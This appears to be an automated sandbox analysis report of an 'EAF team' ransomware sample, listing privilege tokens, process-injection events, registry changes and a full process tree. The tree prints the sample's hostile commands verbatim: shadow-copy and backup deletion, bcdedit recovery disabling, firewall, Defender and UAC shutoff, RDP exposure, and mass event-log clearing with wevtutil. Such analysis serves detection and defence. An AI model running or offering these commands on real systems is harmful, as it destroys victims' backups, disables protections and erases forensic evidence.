Token: SeCreatePagefilePrivilege	828	WMIC.exe
Token: SeBackupPrivilege	828	WMIC.exe
Token: SeRestorePrivilege	828	WMIC.exe
Token: SeShutdownPrivilege	828	WMIC.exe
Token: SeDebugPrivilege	828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	828	WMIC.exe
Token: SeRemoteShutdownPrivilege	828	WMIC.exe
Token: SeUndockPrivilege	828	WMIC.exe
Token: SeManageVolumePrivilege	828	WMIC.exe
Token: 33	828	WMIC.exe
Token: 34	828	WMIC.exe
Token: 35	828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	828	WMIC.exe
Token: SeSecurityPrivilege	828	WMIC.exe
Token: SeTakeOwnershipPrivilege	828	WMIC.exe
Token: SeLoadDriverPrivilege	828	WMIC.exe
Token: SeSystemProfilePrivilege	828	WMIC.exe
Token: SeSystemtimePrivilege	828	WMIC.exe
Token: SeProfSingleProcessPrivilege	828	WMIC.exe
Token: SeIncBasePriorityPrivilege	828	WMIC.exe
Token: SeCreatePagefilePrivilege	828	WMIC.exe
Token: SeBackupPrivilege	828	WMIC.exe
Token: SeRestorePrivilege	828	WMIC.exe
Token: SeShutdownPrivilege	828	WMIC.exe
Token: SeDebugPrivilege	828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	828	WMIC.exe
Token: SeRemoteShutdownPrivilege	828	WMIC.exe
Token: SeUndockPrivilege	828	WMIC.exe
Token: SeManageVolumePrivilege	828	WMIC.exe
Token: 33	828	WMIC.exe
Token: 34	828	WMIC.exe
Token: 35	828	WMIC.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1520	wevtutil.exe
Token: SeBackupPrivilege	1520	wevtutil.exe
Token: SeSecurityPrivilege	1884	wevtutil.exe
Token: SeBackupPrivilege	1884	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	1980	wevtutil.exe
Token: SeBackupPrivilege	1980	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	768	wevtutil.exe
Token: SeBackupPrivilege	768	wevtutil.exe
Token: SeSecurityPrivilege	1216	wevtutil.exe
Token: SeBackupPrivilege	1216	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sample.exeencoderdecryption@yandex.ru.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 556 wrote to memory of 1772	556	sample.exe	encoderdecryption@yandex.ru.exe
PID 556 wrote to memory of 1772	556	sample.exe	encoderdecryption@yandex.ru.exe
PID 556 wrote to memory of 1772	556	sample.exe	encoderdecryption@yandex.ru.exe
PID 1772 wrote to memory of 1528	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1528	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1528	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1528 wrote to memory of 1544	1528	cmd.exe	ReAgentc.exe
PID 1528 wrote to memory of 1544	1528	cmd.exe	ReAgentc.exe
PID 1528 wrote to memory of 1544	1528	cmd.exe	ReAgentc.exe
PID 1772 wrote to memory of 1392	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1392	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1392	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1392 wrote to memory of 540	1392	cmd.exe	wbadmin.exe
PID 1392 wrote to memory of 540	1392	cmd.exe	wbadmin.exe
PID 1392 wrote to memory of 540	1392	cmd.exe	wbadmin.exe
PID 1772 wrote to memory of 1224	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1224	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1224	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1224 wrote to memory of 560	1224	cmd.exe	bcdedit.exe
PID 1224 wrote to memory of 560	1224	cmd.exe	bcdedit.exe
PID 1224 wrote to memory of 560	1224	cmd.exe	bcdedit.exe
PID 1224 wrote to memory of 1092	1224	cmd.exe	bcdedit.exe
PID 1224 wrote to memory of 1092	1224	cmd.exe	bcdedit.exe
PID 1224 wrote to memory of 1092	1224	cmd.exe	bcdedit.exe
PID 1772 wrote to memory of 636	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 636	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 636	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 636 wrote to memory of 1820	636	cmd.exe	vssadmin.exe
PID 636 wrote to memory of 1820	636	cmd.exe	vssadmin.exe
PID 636 wrote to memory of 1820	636	cmd.exe	vssadmin.exe
PID 636 wrote to memory of 828	636	cmd.exe	WMIC.exe
PID 636 wrote to memory of 828	636	cmd.exe	WMIC.exe
PID 636 wrote to memory of 828	636	cmd.exe	WMIC.exe
PID 1772 wrote to memory of 580	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 580	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 580	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 580 wrote to memory of 520	580	cmd.exe	bcdedit.exe
PID 580 wrote to memory of 520	580	cmd.exe	bcdedit.exe
PID 580 wrote to memory of 520	580	cmd.exe	bcdedit.exe
PID 1772 wrote to memory of 316	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 316	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 316	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 316 wrote to memory of 1308	316	cmd.exe	bcdedit.exe
PID 316 wrote to memory of 1308	316	cmd.exe	bcdedit.exe
PID 316 wrote to memory of 1308	316	cmd.exe	bcdedit.exe
PID 1772 wrote to memory of 1016	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1016	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1016	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1016 wrote to memory of 1712	1016	cmd.exe	netsh.exe
PID 1016 wrote to memory of 1712	1016	cmd.exe	netsh.exe
PID 1016 wrote to memory of 1712	1016	cmd.exe	netsh.exe
PID 1772 wrote to memory of 1476	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1476	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 1476	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1476 wrote to memory of 216	1476	cmd.exe	netsh.exe
PID 1476 wrote to memory of 216	1476	cmd.exe	netsh.exe
PID 1476 wrote to memory of 216	1476	cmd.exe	netsh.exe
PID 1772 wrote to memory of 576	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 576	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 1772 wrote to memory of 576	1772	encoderdecryption@yandex.ru.exe	cmd.exe
PID 576 wrote to memory of 1244	576	cmd.exe	reg.exe
PID 576 wrote to memory of 1244	576	cmd.exe	reg.exe
PID 576 wrote to memory of 1244	576	cmd.exe	reg.exe
PID 576 wrote to memory of 1492	576	cmd.exe	reg.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "EAF"	encoderdecryption@yandex.ru.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "You were attacked by the EAF team plz read #FILES-ENCRYPTED.txt"	encoderdecryption@yandex.ru.exe

C:\Users\Admin\AppData\Local\Temp\sample.exe
"C:\Users\Admin\AppData\Local\Temp\sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:556

C:\Users\Admin\AppData\Roaming\encoderdecryption@yandex.ru.exe
"C:\Users\Admin\AppData\Roaming\encoderdecryption@yandex.ru.exe"
2⤵
- Modifies WinLogon for persistence
- Modifies system executable filetype association
- Executes dropped EXE
- Modifies extensions of user files
- Deletes itself
- Drops startup file
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C reagentc /disable
3⤵
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\system32\ReAgentc.exe
reagentc /disable
4⤵
- Drops file in System32 directory
PID:1544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
3⤵
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
4⤵
- Deletes backup catalog
PID:540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
3⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:560

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
3⤵
- Suspicious use of WriteProcessMemory
PID:636

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:1820

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
3⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
3⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
4⤵
PID:1712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
3⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=disable
4⤵
PID:216

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Windows\A8C4AD38.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d "1" /f
4⤵
PID:1244

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" /v "ClientCacheTime" /t REG_DWORD /d "0" /f
4⤵
PID:1492

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
4⤵
PID:1840

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
4⤵
PID:540

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
4⤵
PID:1972

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
4⤵
PID:1308

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
4⤵
PID:868

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
4⤵
PID:1628

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\CredSSP\Parameters" /v "AllowEncryptionOracle" /t REG_DWORD /d "2" /f
4⤵
PID:1648

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
4⤵
PID:1544

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
4⤵
PID:1116

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f
4⤵
PID:980

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
4⤵
PID:1080

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:1500

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /ve /t REG_SZ /d "Take Ownership" /f
4⤵
- Modifies registry class
PID:232

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
4⤵
- Modifies registry class
PID:212

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
4⤵
- Modifies registry class
PID:2024

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
4⤵
- Modifies registry class
PID:768

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Take Ownership" /f
4⤵
- Modifies registry class
PID:288

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
4⤵
- Modifies registry class
PID:1112

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
4⤵
- Modifies registry class
PID:1884

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
4⤵
- Modifies registry class
PID:1076

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\#FILES-ENCRYPTED.txt
3⤵
PID:956

C:\Windows\BackupXXXA8C4AD38.exe
"C:\Windows\BackupXXXA8C4AD38.exe"
3⤵
- Executes dropped EXE
PID:1676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1.cmd"
4⤵
PID:560

C:\Windows\system32\mode.com
mode con cols=74 lines=20
5⤵
PID:1712

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" /v "ClientCacheTime" /t REG_DWORD /d "0" /f
5⤵
PID:980

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
5⤵
PID:232

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
5⤵
PID:768

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=disable
5⤵
PID:1988

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
5⤵
- Modifies boot configuration data using bcdedit
PID:1940

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
5⤵
- Modifies boot configuration data using bcdedit
PID:556

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
5⤵
- Deletes backup catalog
PID:908

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
PID:1484

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:1520

C:\Windows\system32\mode.com
mode con cols=74 lines=25
5⤵
PID:288

C:\Windows\system32\PING.EXE
ping localhost -n 8
5⤵
- Runs ping.exe
PID:892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2.bat"
4⤵
PID:1080

C:\Windows\system32\mode.com
mode con cols=74 lines=20
5⤵
PID:1216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c WEVTUTIL EL
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL EL
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Analytic"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Application"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "DebugChannel"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "DirectShowFilterGraph"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "DirectShowPluginControl"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Els_Hyphenation/Analytic"
5⤵
PID:1640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "EndpointMapper"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "ForwardedEvents"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "HardwareEvents"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Internet Explorer"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Key Management Service"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Media Center"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationDeviceProxy"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationPerformance"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationPipeline"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationPlatform"
5⤵
PID:1716

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-IE/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-IEDVTOOL/Diagnostic"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
5⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
5⤵
PID:700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
5⤵
PID:1972

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-API-Tracing/Operational"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
5⤵
PID:308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AltTab/Diagnostic"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
5⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
5⤵
PID:540

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Backup"
5⤵
PID:1940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
5⤵
PID:288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
5⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
5⤵
PID:1976

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
5⤵
PID:1940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
5⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
5⤵
PID:1972

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Calculator/Debug"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Calculator/Diagnostic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
5⤵
PID:308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
5⤵
PID:1976

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
5⤵
PID:1716

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
5⤵
PID:1520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
5⤵
PID:700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
5⤵
PID:1880

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
5⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
5⤵
PID:1940

C:\Windows\system32\wevtutil.exe
